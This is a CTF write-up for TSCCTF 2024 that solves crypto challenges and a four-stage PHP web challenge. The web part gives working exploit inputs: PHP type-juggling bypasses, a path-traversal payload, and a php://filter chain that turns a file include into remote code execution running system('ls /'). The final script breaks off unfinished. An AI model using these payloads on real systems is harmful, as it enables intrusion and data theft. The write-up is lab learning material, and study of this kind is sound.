# TSCCTF 2024 Writeup
This was the first CTF I ever played, and I was really excited about it.
## Crypto
### Baby PRNG
I thought this challenge was a lot of fun.
You are given a list of 0/1 bits produced by a PRNG; every bit except the last 52 has been XORed with the flag.
The PRNG looks complicated but is actually simple. The following function can be simplified:
```python
# before simplification
def h(a, m):
    return (-a*a - m*m + 0x6861616368616d61) & 1

# after simplification: a*a and m*m have the same parity as a and m,
# the constant is odd, and signs do not matter mod 2
def h(a, m):
    return (a + m + 1) & 1
```
Next is how the PRNG produces its bits, which can also be simplified:
```python
# before simplification
# self.a = [0, 2, 17, 19, 23, 37, 41, 53]
# self.ac = list(map(int, f'{int.from_bytes(urandom(8), "big"):064b}'))
def ha(self):
    m = sum([h(self.ac[i], self.a[i]) for i in range(len(self.a))]) & 1
    a = self.ac[0]
    self.ac = self.ac[1:] + [m]
    return a

# after simplification: sum(self.a) = 192 is even and the eight "+1"s
# cancel mod 2, so only the parity of the first 8 state bits remains
def ha(self):
    m = sum([self.ac[i] for i in range(len(self.a))]) & 1
    a = self.ac[0]
    self.ac = self.ac[1:] + [m]
    return a
```
In short, &1 is just %2, and reduction mod 2 commutes with addition and multiplication, so the order of operations doesn't matter. Since the sum of self.a is even, it can be ignored entirely (if it were odd, it would only add 1).
To summarize the generator: it starts with 64 random bits; each call to ha() returns the 0th bit, appends the parity (&1 of the sum) of the first 8 bits to the end, and drops the 0th bit.
So now we know how the bits are produced. If we had the last 64 bits we could walk backwards all the way (since we know the parity of the 8-bit window, we can deduce the missing bit), but the problem is that only 52 bits are not contaminated by the flag.
It turns out that enumerating 12 bits is affordable ($2^{12} \approx 10^{3.6}$), and the ciphertext has 2112+52 bits in total, so we can find the answer in about $10^7$ operations, which takes under a second in C++. How do we verify a candidate?
The first few characters of the flag are known, namely TSCCTF{, so I took 32 bits of it, XORed them with the output, and used that for verification. Here is the code:
```cpp
#include <bits/stdc++.h>
#define int long long
using namespace std;
// the 52 trailing PRNG bits that were not XORed with the flag
string output = "1100101100001011000010011010011000010110110101111001";
// the 32 keystream bits implied by the known flag prefix (ciphertext XOR "TSCC")
string start = "10000110000110111011110111001101";
signed main(){
    for(int i = 0; i < (1 << 12); i++){          // guess the 12 missing state bits
        string now = output;
        for(int j = 0; j < 12; j++){
            if((i >> j) & 1){
                now += "1";
            }else{
                now += "0";
            }
        }
        for(int j = 0; j < 2112; j++){           // step the generator backwards
            // missing bit = now[63] + now[0] + ... + now[6] (mod 2)
            int sum = -now[63] + '0';
            for(int k = 0; k < 7; k++){
                sum += now[k] - '0';
            }
            sum &= 1;
            if(sum)
                now = "1" + now;
            else
                now = "0" + now;
        }
        string k = now.substr(0, 32);
        if(k == start){                          // candidate matches the known prefix
            cout << now;
            break;
        }
    }
}
```
After that, extracting the flag is easy:
```python
# cryp: the bit string recovered by the C++ program above (the keystream)
cryp = ("100001100001101110111101110011011101110000000110010111110010101110001011011000100010111111110000101101100011011100101100011000000101100011000100101101010011110110000000111101101100010000010111100010111101000010000111100101001101001000010001101100010111010000110110110011010000111011000010010000010110000001000011001111100101011010111110101110111000000100011111000111101101010011011000010110000000001100010110011101011111111101000110000001000111111111001001000011001101111010000110011010001100000111010110100100100100001101001110001101111010010110011000111100101100001110110000111110110010100010001110000101001101100111101111001011101100011010110001011000100111011001000100111011011011111101011000001011010100111011110011111011100110011100110001101000101101001100100001011010110000101101111000110011011000111011010000101011100011100111011111110100010110110011000001001101011101010110001101010111011111101001101011011001001010110001011111110010000100111110011101011100001111101010111000010100010111001010000010101100011010010010000110001111100101100011100001010100000001000100001100111000011001011111011101100101110110111100111111000010110101101100101101110001100011100110101000001100000001001111001111110100100101100101010101011100001000100000011110101101000000101101111001000001000001110010101000011100100110011001101010110100011101010011110111100100111011011000001100000001000110100100000011000111101101110000011100100101100000011111011011001001100000101101000001101111111000011001110000101101000101010011100100110001100101010111101000101011011011110001011111100100000001111001110001011010110011110011110000101000010100010101111010001001010000100111001101010001000011000010100011111010101100101011100100010000111000011100101100011100010011100011100000000110100110001010111100011001101100101100111000101101111010100111010111101101011011011001100100101011101000010100001010001010100010000111111110101100011011100111100110100001010001111111111001010010101100010100000111110010101101111010001001"
        "1010001001101110100001010100000110111011000011000011001011100110101110111010011010111100010101100110110100010101101100111100101100001011000010011010011000010110110101111001110111010111")
# output: the 0/1 list given by the challenge (not reproduced in this writeup)
output = "..."  # placeholder: paste the challenge's ciphertext bits here
result = ""
for i in range(2112):
    result += str(int(cryp[i]) ^ int(output[i]))
print(result)
```
Oh right, I almost forgot to convert it back to a string (from me, one day later).
### Baby staRburSt streAm
I stared at this one for a very long time and honestly didn't expect to solve it. Here is the challenge:
```python
from time import sleep
# n and flag are provided by the challenge and are not shown here
def starburst(x: int):
    return (x * 0x48763 + 0x74) % n

def isBurst() -> bool:
    return True

sleep(10)
for i in range(16):
    flag = starburst(starburst(flag))
    if isBurst():
        print(pow(flag, 0x487, n))
```
This is RSA with a hard-to-factor n and public exponent e. Each ciphertext is the plaintext passed through several rounds of ax+b and then through RSA. So we only need to recover one of the intermediate plaintexts and apply $(x-b)a^{-1}$ to get back to the flag. The RSA part is solved with Franklin-Reiter: for two distinct plaintexts $M_1,\ M_2$ with $M_1 = aM_2 + b$ and given ciphertexts $C_1, C_2$, the method recovers them in $O(e\log^2{e})$ time. Here is the code:
(The template comes from [https://github.com/ValarDragon/CTF-Crypto/blob/master/RSA/FranklinReiter.sage](https://github.com/ValarDragon/CTF-Crypto/blob/master/RSA/FranklinReiter.sage))
It is not hard to understand: $M_2$ is a root of both $(ax+b)^e-C_1=0$ and $x^e-C_2=0$ modulo $n$, so $x-M_2$ is a common factor of the two polynomials, and we just compute their greatest common divisor.
```python
from sage.all import *
from Crypto.Util.number import *
def gcd(a, b):
    # Euclid on polynomials over Zmod(N); the last non-zero remainder is the gcd
    while b:
        a, b = b, a % b
    return a.monic()

def franklinreiter(C1, C2, e, N, a, b):
    P.<X> = PolynomialRing(Zmod(N))   # Sage syntax: run this under SageMath
    g1 = (a*X + b)^e - C1             # M2 is a root of both g1 and g2
    g2 = X^e - C2
    result = -gcd(g1, g2).coefficients()[0]   # gcd is X - M2, so -(constant term) = M2
    return hex(int(result))[2:].replace("L","")

def decryp(x):
    # undo one starburst step: (x - 0x74) * 0x48763^-1 mod n
    return (x - 0x74) * pow(0x48763, -1, n) % n
e = 0x487
n = 16400315632331228798651160245637077709946595645983122370975720487255045029126019080914087625061267248899481815856032068496677195355930968958933039404838878254571702583236164044329257665923139584497190482539593920989421676801793859957608169304853612529356178808220735296012300840838752536726187014265381091018227259048242335988124815353885629899823075491248167441773206742514209629252834744703076252393620438358963295246939345846897055302950273482632799669053630133257184495989695604890380487747829188856813792192971237277430926939234839131130050521927182546512668619537615809443731995454110736457766239564482146568569
c2 = 9260308961776001335079683654718747572438336903567168746535981974278318855032692759257153885905039055033407711267019200203592646520008269923766644860993585286460218972795739102869180413450809247033955148094601634910003769531729400623580272882744281470035984694302667212894337123556661323801286047326767514816733543248434629207024731122643942813447683242886878459891613277457862276625909854228989326353334163039554280752439404396010310405199334053727561305859387863510287420347413696629789948742849397565150526831633504966603337522623781225477850443651798733768731913977084651549438711390939903065839974506543283853601
c1 = 3838341124347146185537009635910934556178469779002373553278305143442949628667246248904699697189046461545271607443187258200623569418481589903276846078300689162335380032370205154218236235391706951498781295069645180066501006984495957843169430368012207252381191661592641589555594495314449543535092171653001054645090621683300525556639326022928733662028287242708622472787824426908276607425565401148689419922009111812244244421555130922557959672741207221681230927040569391705062109388981993437579326664691670974623157272882496693678269281125308787125436186396370825778048227546419210578184041551817826311141746825731799555383
x = 0x48763
y = 0x74
a = x * x
b = x * y + y
x = int(franklinreiter(c1, c2, e, n, a, b), 16) % n
print(long_to_bytes(decryp(decryp(x))))
```
This uses SageMath; you can run it with an online tool.
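To make the gcd argument concrete, here is an added pure-Python version on a toy modulus (example code, not the challenge's or the author's; the Sage template above is what was actually used). Polynomials are coefficient lists over Z_n, the names pmod, pgcd, franklin_reiter and demo are mine, and p, q, e are small constructed parameters chosen with gcd(e, p-1) = gcd(e, q-1) = 1 so that X^e - C2 has a single root and the gcd comes out linear.

```python
A, B = 0x48763, 0x74            # the challenge's affine constants

def starburst(x, n):
    return (x * A + B) % n

def unburst(x, n):              # inverse map: (x - b) * a^-1 mod n
    return (x - B) * pow(A, -1, n) % n

# Polynomials over Z_n as coefficient lists, lowest degree first.
def trim(p):
    while p and p[-1] == 0:
        p.pop()
    return p

def padd(p, q, n):
    r = [0] * max(len(p), len(q))
    for i, c in enumerate(p):
        r[i] = c % n
    for i, c in enumerate(q):
        r[i] = (r[i] + c) % n
    return trim(r)

def pmul(p, q, n):
    r = [0] * (len(p) + len(q) - 1)
    for i, x in enumerate(p):
        for j, y in enumerate(q):
            r[i + j] = (r[i + j] + x * y) % n
    return trim(r)

def pmod(p, q, n):
    """Remainder of p modulo q. The leading coefficient of q must be
    invertible mod n; if it is not, gcd(lc, n) is a factor of n."""
    p, inv = p[:], pow(q[-1], -1, n)
    while len(p) >= len(q):
        coef, shift = p[-1] * inv % n, len(p) - len(q)
        for i, c in enumerate(q):
            p[shift + i] = (p[shift + i] - coef * c) % n
        trim(p)
    return p

def pgcd(p, q, n):
    while q:
        p, q = q, pmod(p, q, n)
    inv = pow(p[-1], -1, n)
    return [c * inv % n for c in p]          # monic, like .monic() in Sage

def franklin_reiter(c1, c2, e, n, a, b):
    """M1 = a*M2 + b with C1 = M1^e, C2 = M2^e: M2 is a common root of
    (aX+b)^e - C1 and X^e - C2, so their gcd is X - M2."""
    g1 = [1]
    for _ in range(e):
        g1 = pmul(g1, [b, a], n)             # (aX + b)^e, low degree first
    g1 = padd(g1, [-c1], n)
    g2 = padd([0] * e + [1], [-c2], n)
    g = pgcd(g1, g2, n)
    assert len(g) == 2, "gcd is not linear: a second common root exists"
    return (-g[0]) % n

def recover_flag(c1, c2, e, n):
    """C2 encrypts f(f(flag)) and C1 encrypts f(f(f(f(flag)))) for the
    starburst map f, so f∘f is the affine map with a = A^2, b = A*B + B."""
    a = A * A % n
    b = (A * B + B) % n
    m2 = franklin_reiter(c1, c2, e, n, a, b)
    return unburst(unburst(m2, n), n)

def demo(flag_int, p, q, e):
    """Constructed instance: produce two consecutive outputs as the
    challenge loop would, then recover the flag from them."""
    n = p * q
    m2 = starburst(starburst(flag_int, n), n)
    m1 = starburst(starburst(m2, n), n)
    return recover_flag(pow(m1, e, n), pow(m2, e, n), e, n)

if __name__ == "__main__":
    flag = int.from_bytes(b"TSC{fr}", "big")     # constructed toy flag
    print(demo(flag, 1000000007, 1000000009, 17) == flag)
```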
### Encode not Encrypt
Once you understand the code, this one is pretty simple: just do everything it does in reverse.
It gives you encodeds and hint. hint is a string of letters where uppercase stands for 1 and lowercase for 0; read as binary, each pair tells you which encoding function was used. So we read hint and write a decoder for each function. Here is the code:
```python
cipher = "6e6176696761746f72 157165164143157155145 #%%?#%==#%=?#%#? 67617264656e696e67 147150172 707473 6c696e64736179 143165163164157155163 sssu #%#?#%%##=?=#%?=#%%##=??#%=?#%%##%=%#%?##=?%#=%# #%?=#%==#%=%#=?=#%==#%=?#%## sutlsvtqtn #=?=#%==#=?%#=#? #%?##%?%#=?=#=#?#=?%#%?##%?=#=#? #%=?#%?##%?%#%==#=###=?% #%%?#%==#=###=?%#=?= 636f6e636c7573696f6e73 tntt 146145155141154145163 #=??#=###%?% 164162141156163151164 twtktntksxsw 141147162145145144 144165155160 #=#?#%%? 166141143141164151157156 72656672657368 164150145141164162145 #%?%#=###=?%#=#?#%==#%=% 143150141162147145162 sztu #%?%#%%##%%=#%%##%=%#%%# 163160162151156164 142154165145163 sztksxsvtqtktlsw 144157143165155145156164 66726564657269636b 6372617073 162141143151156147 736f75746877657374 #%#%#=###%%%#%%##=#?#=?=#=## #=?=#=###%?%#=?=#%###%?=#=#?#%%##%==#%=% 636f72726563746564 sstktmtytl 736f6469756d 146157157 svtutwtrtltqsysutu 6b6e6974 6a61 143157165162141147145 164162145155142154 trtv tytssxtututv twtktltwtnsuswtqtktlsw tvtysvtytxtyswtu #=#?#=?%#%?##%?=#%%=#%?%#%?##%?=#%%= #%?##=?%#%?=#%%?#%%##=#?#%###%?=#=#?#=?= 150157154144151156147 163157154144151145162163 163164145160150145156 62617262617261 sxtutttusx 7265636f76657279 686f706566756c6c79 141160141143150145 #=%##%?##=?%#%=% #%#%#=?%#%?##=###%#? #%###%=%#%%?#%?##%=%#%?=#%###%#? 64656c65746564 147145156164154171 twtktmtmtqswswtqtktlsw twtktlsttusxsvtusx #%#?#%###=?=#=#?#=?%#%==#=%##%###%#? #=?%#%?##%#?#%%##%?##=#?#%%##%==#%=% #=?=#%?=#%?##%=?#%###=?= tutlswsusxtu #%?##%%##%=##=?= 150165156164 636f6d7075746174696f6e616c 657175696c69627269756d tstksxtstutksusw 617267 162145163145164 151156166145163164157162163 154147 sztntysvtusw #=??#%=?#=###%#=#%%##%=%#=?= 144145145 #=#?#%###%?=#%%?#%=%#%==#%=?#%==#%#=#%%##%?=#%?##%=? twtktl 72656d656479 #=??#%#?#%#% sxtutytwtrtqtlts 666c6f707079 143157156146151147165162145144 tqtlsvtusxszsxtusvtysvtqtktl 74726962616c swtrtytvtusw szsxtktvsutwtqtlts 676d74"
cipher = cipher.split(' ')
hint = "wuNANwatZMnqhvRKcKFqWcmMUcGcLuVspetJDZRlMOfTISBACtHRumFSNyFDwJCjUFJGxACOurjtMKmiCrUwcsfCwwCNfOvkajCFYPgPpGdHqVTaMsDTKIRCihpPzbdwCZWpWnUcpuDCiDlLEtQkXbcMVbBAlpyceXwuNIMFKDaEJwJJEerVqtXibBrhPThBdelPhWav"
hint = [1 if hint[i].isupper() else 0 for i in range(len(hint))]
def a_decoder(word):                 # hex string -> ascii
    return bytes.fromhex(word).decode("ascii")

b_chars = 'zyxwvutsrqponmlkjihgfedcba'
def b_decoder(word):                 # two letters -> two nibbles -> one byte
    result = ""
    for i in range(0, len(word), 2):
        front = b_chars.find(word[i])
        back = b_chars.find(word[i + 1])
        front = f'{front:04b}'
        back = f'{back:04b}'
        result += chr(int(front + back, 2))
    return result

c_chars = '?#%='
def c_decoder(word):                 # four symbols, 2 bits each -> one byte
    result = ""
    for i in range(0, len(word), 4):
        binary = ""
        for j in range(0, 4, 1):
            pos = c_chars.find(word[i + j])
            binary += f'{pos:02b}'
        result += chr(int(binary, 2))
    return result

def d_decoder(word):                 # three octal digits -> one byte
    result = ""
    for i in range(0, len(word), 3):
        result += chr(int(word[i:i+3], 8))
    return result

def d(s):                            # the matching encoder for d, kept for reference
    return "".join(oct(ord(c))[2:] for c in s)

selected = []
for num, i in enumerate(range(len(cipher))):
    # two hint bits per word select the decoder: 00=a, 01=b, 10=c, 11=d
    if hint[2 * num] == 0 and hint[2 * num + 1] == 0:
        selected.append(a_decoder(cipher[i]))
    elif hint[2 * num] == 0 and hint[2 * num + 1] == 1:
        selected.append(b_decoder(cipher[i]))
    elif hint[2 * num] == 1 and hint[2 * num + 1] == 0:
        selected.append(c_decoder(cipher[i]))
    else:
        selected.append(d_decoder(cipher[i]))
ans = " ".join(selected)
print(ans)
```
## Web
### [Tutorial] 極之番『漩渦』
It has 4 stages in total:
- Stage 1
```php
<?php
include('config.php');
echo '<h1>👻 Stage 1 / 4</h1>';
$A = $_GET['A'];
$B = $_GET['B'];
highlight_file(__FILE__);
echo '<hr>';
if (isset($A) && isset($B))
    if ($A != $B)
        if (strcmp($A, $B) == 0)
            if (md5($A) === md5($B))
                echo "<a href=$stage2>Go to stage2</a>";
            else die('ERROR: MD5(A) != MD5(B)');
        else die('ERROR: strcmp(A, B) != 0');
    else die('ERROR: A == B');
else die('ERROR: A, B should be given');
```
This is solved via PHP's weak typing: pass arrays for both A and B, then strcmp() returns NULL and the checks pass.
The input used: stage1.php?A[]=0&B[]=1
- Stage 2
```php
<?php
include('config.php');
echo '<h1>👻 Stage 2 / 4</h1>';
$A = $_GET['A'];
$B = $_GET['B'];
highlight_file(__FILE__);
echo '<hr>';
if (isset($A) && isset($B))
    if ($A !== $B){
        $is_same = md5($A) == 0 and md5($B) === 0;
        if ($is_same)
            echo (md5($B) ? "QQ1" : md5($A) == 0 ? "<a href=$stage3?page=swirl.php>Go to stage3</a>" : "QQ2");
        else die('ERROR: $is_same is false');
    }
else die('ERROR: A, B should be given');
```
This works because PHP treats a string starting with 0e as 0 in a loose comparison, so for A just pick any value whose md5 has that 0e form, and B has to be 0.
- Stage 3
```php
<?php
include('config.php');
echo '<h1>👻 Stage 3 / 4</h1>';
$page = $_GET['page'];
highlight_file(__FILE__);
echo '<hr>';
if (isset($page)) {
    $path = strtolower($_GET['page']);
    // filter \ _ /
    if (preg_match("/\\_|\//", $path)) {
        echo "<p>bad hecker detect! </p>";
    }else{
        $path = str_replace("..\\", "../", $path);
        $path = str_replace("..", ".", $path);
        echo $path;
        echo '<hr>';
        echo file_get_contents("./page/".$path);
    }
} else die('ERROR: page should be given');
```
Here, the include of config.php looks suspicious, and the restrictions on the path parameter can be bypassed using the str_replace() calls themselves. So the first step is to get the contents of config.php. After a few tries, ?page=...\config.php does the trick. After running it, nothing seems to happen; at that point, view the page source.
```php
<?php
$stage2 = "stage2_212ad0bdc4777028af057616450f6654.php";
$stage3 = "stage3_099b3b060154898840f0ebdfb46ec78f.php";
$secret = "flag{this_is_a_fake_flag}";
$stage4 = "stage4_b182g38e7db23o8eo8qwdehb23asd311.php";
```
Now we can move on to stage 4.
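As an added illustration (not the challenge's code), here is the stage-3 sanitizer replayed in Python, showing why the two str_replace() calls undo the filter, next to the check a defender would use instead: resolve the real path and require it to stay inside the page directory. stage3_sanitize and safe_page_path are my names, and /tmp/page in the test is a constructed directory.

```python
import os
import re


def stage3_sanitize(page: str):
    """Mirror of the PHP logic: lower-case, reject '_' and '/', then apply the
    two replacements. Returns the path that file_get_contents() would open,
    or None when the filter fires."""
    path = page.lower()
    if re.search(r"_|/", path):             # preg_match("/\\_|\//", ...)
        return None                           # "bad hecker detect!"
    path = path.replace("..\\", "../")        # re-introduces the '/' just rejected
    path = path.replace("..", ".")            # and turns '...' into '..'
    return "./page/" + path


def safe_page_path(base_dir: str, page: str):
    """Allow-list approach: canonicalise first, then check containment.
    Returns the resolved path, or None if it leaves base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        return None
    return target
```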
- Stage 4
```php
<?php
echo '<h1>👻 Stage 4 / 4</h1>';
highlight_file(__FILE__);
echo '<hr>';
extract($_POST);
if (isset($👀))
    include($👀);
else die('ERROR: 👀 should be given');
```
This is obviously LFI, and LFI here means RCE. So I used Python to send a POST request that loads a webshell through the include and lists the root directory:
```python
import requests
url = "http://172.31.210.1:33002/stage4_b182g38e7db23o8eo8qwdehb23asd311.php"
# the php://filter chain is one long string; adjacent literals are concatenated
tmp = {"👀" : "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.CSISO99NAPLPS.CP902|convert.iconv.ISO-IR-143.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.PT154.874|convert.iconv.CSISO2022KR.UTF-32|convert.iconv.CSIBM901.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSA_T500.EUCJP-WIN|convert.iconv.CP855.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.ISO-10646/UTF-8|convert.iconv.BALTIC.SHIFT_JISX0213|convert.iconv.CP949.CP1361|convert.iconv.CSISOLATIN2.T.61|convert.iconv.IBM932.BIG-5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-"
             "encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.NAPLPS.UCS-4|convert.iconv.ISO_8859-4.T.618BIT|convert.iconv.CSISO103T618BIT.BIG5-HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.iconv.OSF00010009.ISO2022JP2|convert.iconv.UTF16.ISO-10646/UTF-8|convert.iconv.UTF-16.UTF8|convert.iconv.ISO_8859-14:1998.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-103.CSEUCPKDFMTJAPANESE|convert.iconv.OSF00010002.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.CSEUCKR.UTF-32|convert.base64-decode|conver"
             "t.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UK.852|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.ISO6937.UCS-2LE|convert.iconv.CP864.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|conve"
             "rt.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.OSF00010104|convert.iconv.CP860.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UTF-32BE.MS936|convert.iconv.8859_5.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-90.UTF16LE|convert.iconv.IBM874.UNICODEBIG|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-103.ISO-IR-209|convert.iconv.8859_5.CSISO2022JP2|convert.iconv.ISO-2022-JP-3.IBM-943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOW"
             "S31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"}
x = requests.post(url, data = tmp, params={"1":"system(\"ls /\");"})
print(x.text)
```
The listing contains flag_cr14x5hc, which is obviously the flag, so cat it:
```python
import requests
url = "http://172.31.210.1:33002/stage4_b182g38e7db23o8eo8qwdehb23asd311.php"
# same php://filter chain as above, split over several adjacent string literals
